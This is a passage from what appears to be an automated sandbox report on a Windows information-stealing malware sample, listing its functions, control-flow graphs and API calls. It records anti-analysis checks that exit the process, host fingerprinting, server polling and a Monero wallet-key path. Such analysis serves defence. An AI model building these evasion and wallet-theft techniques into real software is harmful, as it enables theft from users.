                            • InternetCloseHandle.WININET(00000000), ref: 006764EF
                            • InternetCloseHandle.WININET(00000000), ref: 006764F9
                            • InternetCloseHandle.WININET(00000000), ref: 00676503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: b5bef490f1ed27de80546f7ff99f69d69844c77eb91a026494ee025af379bd95
                            • Instruction ID: 125a75d0074880a0b0f1461e88518ce11f0744e8cc78b3d1189d75cbc434d9e4
                            • Opcode Fuzzy Hash: b5bef490f1ed27de80546f7ff99f69d69844c77eb91a026494ee025af379bd95
                            • Instruction Fuzzy Hash: 29715171A00218EBEF24EFE0CC45BEE77B9BB44700F108259F50A6B594DBB46A85CF55
                            Function 00685510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 685510-685577 call 685ad0 call 68a820 * 3 call 68a740 * 4 1106 68557c-685583 1090->1106 1107 685585-6855b6 call 68a820 call 68a7a0 call 671590 call 6851f0 1106->1107 1108 6855d7-68564c call 68a740 * 2 call 671590 call 6852c0 call 68a8a0 call 68a800 call 68aad0 StrCmpCA 1106->1108 1124 6855bb-6855d2 call 68a8a0 call 68a800 1107->1124 1134 685693-6856a9 call 68aad0 StrCmpCA 1108->1134 1137 68564e-68568e call 68a7a0 call 671590 call 6851f0 call 68a8a0 call 68a800 1108->1137 1124->1134 1140 6857dc-685844 call 68a8a0 call 68a820 * 2 call 671670 call 68a800 * 4 call 686560 call 671550 1134->1140 1141 6856af-6856b6 1134->1141 1137->1134 1272 685ac3-685ac6 1140->1272 1142 6857da-68585f call 68aad0 StrCmpCA 1141->1142 1143 6856bc-6856c3 1141->1143 1161 685991-6859f9 call 68a8a0 call 68a820 * 2 call 671670 call 68a800 * 4 call 686560 call 671550 1142->1161 1162 685865-68586c 1142->1162 1146 68571e-685793 call 68a740 * 2 call 671590 call 6852c0 call 68a8a0 call 68a800 call 68aad0 StrCmpCA 1143->1146 1147 6856c5-685719 call 68a820 call 68a7a0 call 671590 call 6851f0 call 68a8a0 call 68a800 1143->1147 1146->1142 1250 685795-6857d5 call 68a7a0 call 671590 call 6851f0 call 68a8a0 call 68a800 1146->1250 1147->1142 1161->1272 1167 68598f-685a14 call 68aad0 StrCmpCA 1162->1167 1168 685872-685879 1162->1168 1197 685a28-685a91 call 68a8a0 call 68a820 * 2 call 671670 call 68a800 * 4 call 686560 call 671550 1167->1197 1198 685a16-685a21 Sleep 1167->1198 1174 68587b-6858ce call 68a820 call 68a7a0 call 671590 call 6851f0 call 68a8a0 call 68a800 1168->1174 1175 6858d3-685948 call 68a740 * 2 call 671590 call 6852c0 call 68a8a0 call 68a800 call 68aad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 68594a-68598a call 68a7a0 call 671590 call 6851f0 call 68a8a0 call 68a800 1175->1276 1197->1272 1198->1106 1250->1142 1276->1167
                            APIs
                              • Part of subcall function 0068A820: lstrlen.KERNEL32(00674F05,?,?,00674F05,00690DDE), ref: 0068A82B
                              • Part of subcall function 0068A820: lstrcpy.KERNEL32(00690DDE,00000000), ref: 0068A885
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006856A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685857
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685228
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 006852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685318
                              • Part of subcall function 006852C0: lstrlen.KERNEL32(00000000), ref: 0068532F
                              • Part of subcall function 006852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00685364
                              • Part of subcall function 006852C0: lstrlen.KERNEL32(00000000), ref: 00685383
                              • Part of subcall function 006852C0: lstrlen.KERNEL32(00000000), ref: 006853AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0068578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00685A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 2f874007829561761055307864dc9334e9ba9c61912430fccbbb7a9d109cd85b
                            • Instruction ID: 05816c20202d3405cbda754235e98eaaaffd380f98f535eb5ff49ba7e20549cb
                            • Opcode Fuzzy Hash: 2f874007829561761055307864dc9334e9ba9c61912430fccbbb7a9d109cd85b
                            • Instruction Fuzzy Hash: 29E114B19101049AEB58FBE0DC969ED737EBF54300F50832DB90766591EF386B09CBA6
                            Function 006817A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 6817a0-6817cd call 68aad0 StrCmpCA 1304 6817cf-6817d1 ExitProcess 1301->1304 1305 6817d7-6817f1 call 68aad0 1301->1305 1309 6817f4-6817f8 1305->1309 1310 6817fe-681811 1309->1310 1311 6819c2-6819cd call 68a800 1309->1311 1313 68199e-6819bd 1310->1313 1314 681817-68181a 1310->1314 1313->1309 1316 681849-681858 call 68a820 1314->1316 1317 6818ad-6818be StrCmpCA 1314->1317 1318 6818cf-6818e0 StrCmpCA 1314->1318 1319 68198f-681999 call 68a820 1314->1319 1320 681821-681830 call 68a820 1314->1320 1321 68185d-68186e StrCmpCA 1314->1321 1322 68187f-681890 StrCmpCA 1314->1322 1323 681970-681981 StrCmpCA 1314->1323 1324 6818f1-681902 StrCmpCA 1314->1324 1325 681951-681962 StrCmpCA 1314->1325 1326 681932-681943 StrCmpCA 1314->1326 1327 681913-681924 StrCmpCA 1314->1327 1328 681835-681844 call 68a820 1314->1328 1316->1313 1336 6818ca 1317->1336 1337 6818c0-6818c3 1317->1337 1338 6818ec 1318->1338 1339 6818e2-6818e5 1318->1339 1319->1313 1320->1313 1332 68187a 1321->1332 1333 681870-681873 1321->1333 1334 68189e-6818a1 1322->1334 1335 681892-68189c 1322->1335 1349 68198d 1323->1349 1350 681983-681986 1323->1350 1340 68190e 1324->1340 1341 681904-681907 1324->1341 1346 68196e 1325->1346 1347 681964-681967 1325->1347 1344 68194f 1326->1344 1345 681945-681948 1326->1345 1342 681930 1327->1342 1343 681926-681929 1327->1343 1328->1313 1332->1313 1333->1332 1353 6818a8 1334->1353 1335->1353 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1349->1313 1350->1349 1353->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 006817C5
                            • ExitProcess.KERNEL32 ref: 006817D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: cba6c9864cab8d05bbb18efd7a9afa05182d9fab39c55b3a9655bcbace23f15f
                            • Instruction ID: daeea9648076416cf399369e855bcf7d28506fcb2e6839c0786725d3259cb7c3
                            • Opcode Fuzzy Hash: cba6c9864cab8d05bbb18efd7a9afa05182d9fab39c55b3a9655bcbace23f15f
                            • Instruction Fuzzy Hash: 6F5184B4A04209EFDF04EFA4D964EBE77BABF45304F104259E8066B740D770E956CB62
                            Function 00687500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 687500-68754a GetWindowsDirectoryA 1357 68754c 1356->1357 1358 687553-6875c7 GetVolumeInformationA call 688d00 * 3 1356->1358 1357->1358 1365 6875d8-6875df 1358->1365 1366 6875fc-687617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6875e1-6875fa call 688d00 1365->1367 1369 687628-687658 wsprintfA call 68a740 1366->1369 1370 687619-687626 call 68a740 1366->1370 1367->1365 1377 68767e-68768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00687542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0068757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068760A
                            • wsprintfA.USER32 ref: 00687640
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$i
                            • API String ID: 1544550907-2790019683
                            • Opcode ID: e4b9bda9e51a3064d8908240102591f6c6944f9dad84cd46f5e6fce60fe2b11b
                            • Instruction ID: 526ae371377fa9556a8f040e3bf58cb22c8497036f135a52258ee7de655c5764
                            • Opcode Fuzzy Hash: e4b9bda9e51a3064d8908240102591f6c6944f9dad84cd46f5e6fce60fe2b11b
                            • Instruction Fuzzy Hash: CF4194B1D04248ABDB10EF94DC45BDEBBB9FF18700F100299F50967280DB75AA44CBA5
                            Function 006869F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1630), ref: 006898A1
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B15E8), ref: 006898BA
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1648), ref: 006898D2
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1678), ref: 006898EA
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1528), ref: 00689903
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B8A68), ref: 0068991B
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012A5588), ref: 00689933
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012A54C8), ref: 0068994C
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1690), ref: 00689964
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B16A8), ref: 0068997C
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B17C8), ref: 00689995
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B16D8), ref: 006899AD
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012A56A8), ref: 006899C5
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B16F0), ref: 006899DE
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 006711D0: ExitProcess.KERNEL32 ref: 00671211
                              • Part of subcall function 00671160: GetSystemInfo.KERNEL32(?), ref: 0067116A
                              • Part of subcall function 00671160: ExitProcess.KERNEL32 ref: 0067117E
                              • Part of subcall function 00671110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0067112B
                              • Part of subcall function 00671110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00671132
                              • Part of subcall function 00671110: ExitProcess.KERNEL32 ref: 00671143
                              • Part of subcall function 00671220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0067123E
                              • Part of subcall function 00671220: __aulldiv.LIBCMT ref: 00671258
                              • Part of subcall function 00671220: __aulldiv.LIBCMT ref: 00671266
                              • Part of subcall function 00671220: ExitProcess.KERNEL32 ref: 00671294
                              • Part of subcall function 00686770: GetUserDefaultLangID.KERNEL32 ref: 00686774
                              • Part of subcall function 00671190: ExitProcess.KERNEL32 ref: 006711C6
                              • Part of subcall function 00687850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006711B7), ref: 00687880
                              • Part of subcall function 00687850: RtlAllocateHeap.NTDLL(00000000), ref: 00687887
                              • Part of subcall function 00687850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0068789F
                              • Part of subcall function 006878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687910
                              • Part of subcall function 006878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00687917
                              • Part of subcall function 006878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0068792F
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00686AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00686AF9
                            • Sleep.KERNEL32(00001770), ref: 00686B04
                            • CloseHandle.KERNEL32(?,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686B1A
                            • ExitProcess.KERNEL32 ref: 00686B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: ab5ea9dae182d30677c9c83785e85f56ac16ae4358ce7a1ce11fffea60244206
                            • Instruction ID: 280f175798250a264a6b0f103319da8f61eab057a0935bc6cab3330a8e3347dc
                            • Opcode Fuzzy Hash: ab5ea9dae182d30677c9c83785e85f56ac16ae4358ce7a1ce11fffea60244206
                            • Instruction Fuzzy Hash: 52316F70904208AAEB48F7F0DC56BEE777ABF04300F10471DF612A6192DF746A01C7AA
                            Function 00671220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 671220-671247 call 6889b0 GlobalMemoryStatusEx 1439 671273-67127a 1436->1439 1440 671249-671271 call 68da00 * 2 1436->1440 1441 671281-671285 1439->1441 1440->1441 1443 671287 1441->1443 1444 67129a-67129d 1441->1444 1446 671292-671294 ExitProcess 1443->1446 1447 671289-671290 1443->1447 1447->1444 1447->1446
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0067123E
                            • __aulldiv.LIBCMT ref: 00671258
                            • __aulldiv.LIBCMT ref: 00671266
                            • ExitProcess.KERNEL32 ref: 00671294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 97bf69915272c58e8dca3ed7e66370cd0960f36faa65c2c7dd7700e88468dd2f
                            • Instruction ID: f4da59abce0d32fc197c4174fffff7de678b4c79928a372316b673e95be7efad
                            • Opcode Fuzzy Hash: 97bf69915272c58e8dca3ed7e66370cd0960f36faa65c2c7dd7700e88468dd2f
                            • Instruction Fuzzy Hash: FE0162B0D44308FBDF54EBD4CC49B9DBB79AB04701F208149E719BA2C1D77456818759
                            Function 00686AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 686af3 1451 686b0a 1450->1451 1453 686aba-686ad7 call 68aad0 OpenEventA 1451->1453 1454 686b0c-686b22 call 686920 call 685b10 CloseHandle ExitProcess 1451->1454 1459 686ad9-686af1 call 68aad0 CreateEventA 1453->1459 1460 686af5-686b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00686AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00686AF9
                            • Sleep.KERNEL32(00001770), ref: 00686B04
                            • CloseHandle.KERNEL32(?,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686B1A
                            • ExitProcess.KERNEL32 ref: 00686B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: d0d06a7378dce0694bc8c14865676403d6b362a0859928388ad0f440b26d3cc4
                            • Instruction ID: 675665c06daf119e83fb6ca8c6d58b79277bc0bcf3756f5596f189e4e591f949
